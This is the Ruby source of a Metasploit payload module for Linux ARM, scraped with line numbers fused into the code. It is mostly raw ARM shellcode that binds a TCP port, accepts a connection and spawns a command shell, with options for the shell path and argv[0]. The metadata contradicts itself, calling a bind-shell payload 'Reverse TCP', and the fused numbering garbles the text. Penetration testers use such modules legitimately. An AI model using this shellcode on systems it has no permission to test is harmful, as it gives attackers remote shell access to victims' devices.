Path: blob/master/modules/payloads/singles/linux/armle/shell_bind_tcp.rb
19612 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45module MetasploitModule6CachedSize = 20878include Msf::Payload::Single9include Msf::Payload::Linux::Armle::Prepends10include Msf::Sessions::CommandShellOptions1112def initialize(info = {})13super(14merge_info(15info,16'Name' => 'Linux Command Shell, Reverse TCP Inline',17'Version' => '',18'Description' => 'Connect to target and spawn a command shell',19'Author' => ['civ', 'hal'],20'License' => MSF_LICENSE,21'Platform' => 'linux',22'Arch' => ARCH_ARMLE,23'Handler' => Msf::Handler::BindTcp,24'Session' => Msf::Sessions::CommandShellUnix,25'Payload' => {26'Offsets' =>27{28'RHOST' => [ 172, 'ADDR' ],29'LPORT' => [ 170, 'n' ]30},31'Payload' =>32[33# socket340xe3a00002, # mov r0, #2350xe3a01001, # mov r1, #1360xe3a02006, # mov r2, #6370xe3a07001, # mov r7, #1380xe1a07407, # lsl r7, r7, #8390xe2877019, # add r7, r7, #25400xef000000, # svc 0x00000000410xe1a06000, # mov r6, r04243# bind440xe28f1080, # 1dr r1, pc, #128450xe3a02010, # mov r2, #16460xe3a07001, # mov r7, #1470xe1a07407, # lsl r7, r7, #8480xe287701a, # add r7, r7, #26490xef000000, # svc 0x000000005051# listen520xe1a00006, # mov r0, r6530xe3a07001, # mov r7, #1540xe1a07407, # lsl r7, r7, #8550xe287701c, # add r7, r7, #28560xef000000, # svc 0x000000005758# accept590xe1a00006, # mov r0, r6600xe0411001, # sub r1, r1, r1610xe0422002, # sub r2, r2, r2620xe3a07001, # mov r7, #1630xe1a07407, # lsl r7, r7, #8640xe287701d, # add r7, r7, #29650xef000000, # svc 0x000000006667# dup680xe1a06000, # mov r6, r0690xe3a01002, # mov r1, #2700xe1a00006, # mov r0, r6710xe3a0703f, # mov r7, #63 ; 0x3f720xef000000, # svc 0x00000000730xe2511001, # subs r1, r1, #1740x5afffffa, # bpl 8c <.text+0x8c>7576# execve("/system/bin/sh", args, env)770xe28f0024, # add r0, pc, #36 ; 0x24780xe0244004, # eor r4, r4, r4790xe92d0010, # push {r4}800xe1a0200d, # mov r2, sp810xe28f4024, # add r4, pc, #36 ; 0x10820xe92d0010, # push {r4}830xe1a0100d, # mov r1, sp840xe3a0700b, # mov r7, #11 ; 0xb850xef000000, # svc 0x000000008687# <af>:880x04290002, # .word 0x5c110002 @ port: 4444 , sin_fam = 2890x0101a8c0, # .word 0x0101a8c0 @ ip: 192.168.1.19091# <shell>:920x00000000, # .word 0x00000000 ; the shell goes here!930x00000000, # .word 0x00000000940x00000000, # .word 0x00000000950x00000000, # .word 0x000000009697# <arg>:980x00000000, # .word 0x00000000 ; the args!990x00000000, # .word 0x000000001000x00000000, # .word 0x000000001010x00000000, # .word 0x00000000102].pack('V*')103}104)105)106107# Register command execution options108register_options(109[110OptString.new('SHELL', [ true, 'The shell to execute.', '/bin/sh' ]),111OptString.new('ARGV0', [ false, 'argv[0] to pass to execve', 'sh' ]) # mostly used for busybox112]113)114end115116def generate(_opts = {})117p = super118119sh = datastore['SHELL']120if sh.length >= 16121raise ArgumentError, 'The specified shell must be less than 16 bytes.'122end123124p[176, sh.length] = sh125126arg = datastore['ARGV0']127if arg128if arg.length >= 16129raise ArgumentError, 'The specified argv[0] must be less than 16 bytes.'130end131132p[192, arg.length] = arg133end134135p136end137end138139140